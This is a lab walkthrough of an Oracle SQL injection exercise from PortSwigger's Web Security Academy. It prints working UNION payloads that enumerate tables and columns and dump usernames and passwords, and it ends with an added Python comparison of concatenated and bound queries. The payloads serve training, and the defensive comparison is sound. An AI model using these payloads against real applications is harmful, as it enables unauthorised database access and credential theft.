Write-up: SQL injection attack, listing the database contents on Oracle @ PortSwigger Academy

Frank Leitner
Jun 6, 2022

This write-up for the lab "SQL injection attack, listing the database contents on Oracle" is part of my walkthrough series for PortSwigger’s Web Security Academy.

Learning path: Server-side topics → SQL injection

Python script: script.py

Lab description

Query

The query used in the lab will look something like

SELECT * FROM someTable WHERE category = '<CATEGORY>'

Steps

The first steps are identical to the labs "SQL injection UNION attack, determining the number of columns returned by the query" and "SQL injection UNION attack, finding a column containing text", and are not repeated here.

As a result of these steps, I find out that the number of columns is 2, with both being string columns.

Find users table

The database in use here is Oracle, which holds the table information in the all_tables table. The relevant documentation lists the available columns.

I am interested in table_name, so I inject ' UNION SELECT table_name, null from all_tables-- into the parameter. I also select an invalid category so that only my output appears. This forms the following query:

SELECT * FROM someTable WHERE category='X' UNION SELECT table_name, null from all_tables--'

Enumerate columns in this table

The all_tab_columns table holds information about the columns of each table; the column I need from it is column_name. The proper string to inject is ' UNION SELECT column_name, null from all_tab_columns WHERE table_name = 'USERS_TOAEAL'-- to form this query:

SELECT * FROM someTable WHERE category='X' UNION SELECT column_name, null from all_tab_columns WHERE table_name = 'USERS_TOAEAL'--'

Enumerate all usernames and passwords

Now I have all the information needed to obtain the required usernames and passwords. I inject ' UNION SELECT USERNAME_DINZLR, PASSWORD_BTNGGB from USERS_TOAEAL-- to form this query:

SELECT * FROM someTable WHERE category='X' UNION SELECT USERNAME_DINZLR, PASSWORD_BTNGGB from USERS_TOAEAL--'

The last step is to simply log in to solve this exercise.
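Every query above works only because the category value is pasted into the SQL text. The following is an added example, not part of the original write-up or the lab's code: it runs the first payload from this page against a concatenated query and against the same query with a bind variable. Assumptions: sqlite3 stands in for Oracle so the code runs offline, the all_tables table is a constructed stand-in for Oracle's dictionary view, and the function names are hypothetical.

```python
import sqlite3

# Payload quoted from the write-up (invalid category 'X' plus the injected UNION).
PAYLOAD = "X' UNION SELECT table_name, null from all_tables--"


def make_db():
    """Constructed in-memory stand-in; sqlite3 replaces Oracle so this runs offline."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE someTable (name TEXT, category TEXT);
        INSERT INTO someTable VALUES ('Constructed product', 'Gifts');
        -- Stand-in for the Oracle all_tables dictionary view (constructed rows).
        CREATE TABLE all_tables (table_name TEXT);
        INSERT INTO all_tables VALUES ('SOMETABLE'), ('USERS_TOAEAL');
    """)
    return db


def products_concat(db, category):
    """Vulnerable form: the parameter becomes part of the SQL text."""
    sql = "SELECT * FROM someTable WHERE category = '" + category + "'"
    return sql, db.execute(sql).fetchall()


def products_bound(db, category):
    """Hardened form: the parameter travels as a bind variable, never as SQL.

    The :name placeholder style is also what Oracle drivers use for binds.
    """
    sql = "SELECT * FROM someTable WHERE category = :category"
    return sql, db.execute(sql, {"category": category}).fetchall()


if __name__ == "__main__":
    db = make_db()
    for fn in (products_concat, products_bound):
        sql, rows = fn(db, PAYLOAD)
        print(fn.__name__, "|", sql, "|", rows)
```

With the bind variable the whole payload is compared against the category column as one literal string, so the query returns no rows and the dictionary view is never read.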

Originally published at https://github.com.

Frank Leitner

Tech nerd, doing security stuff for fun and some as a job | CISSP-ISSAP, OSCP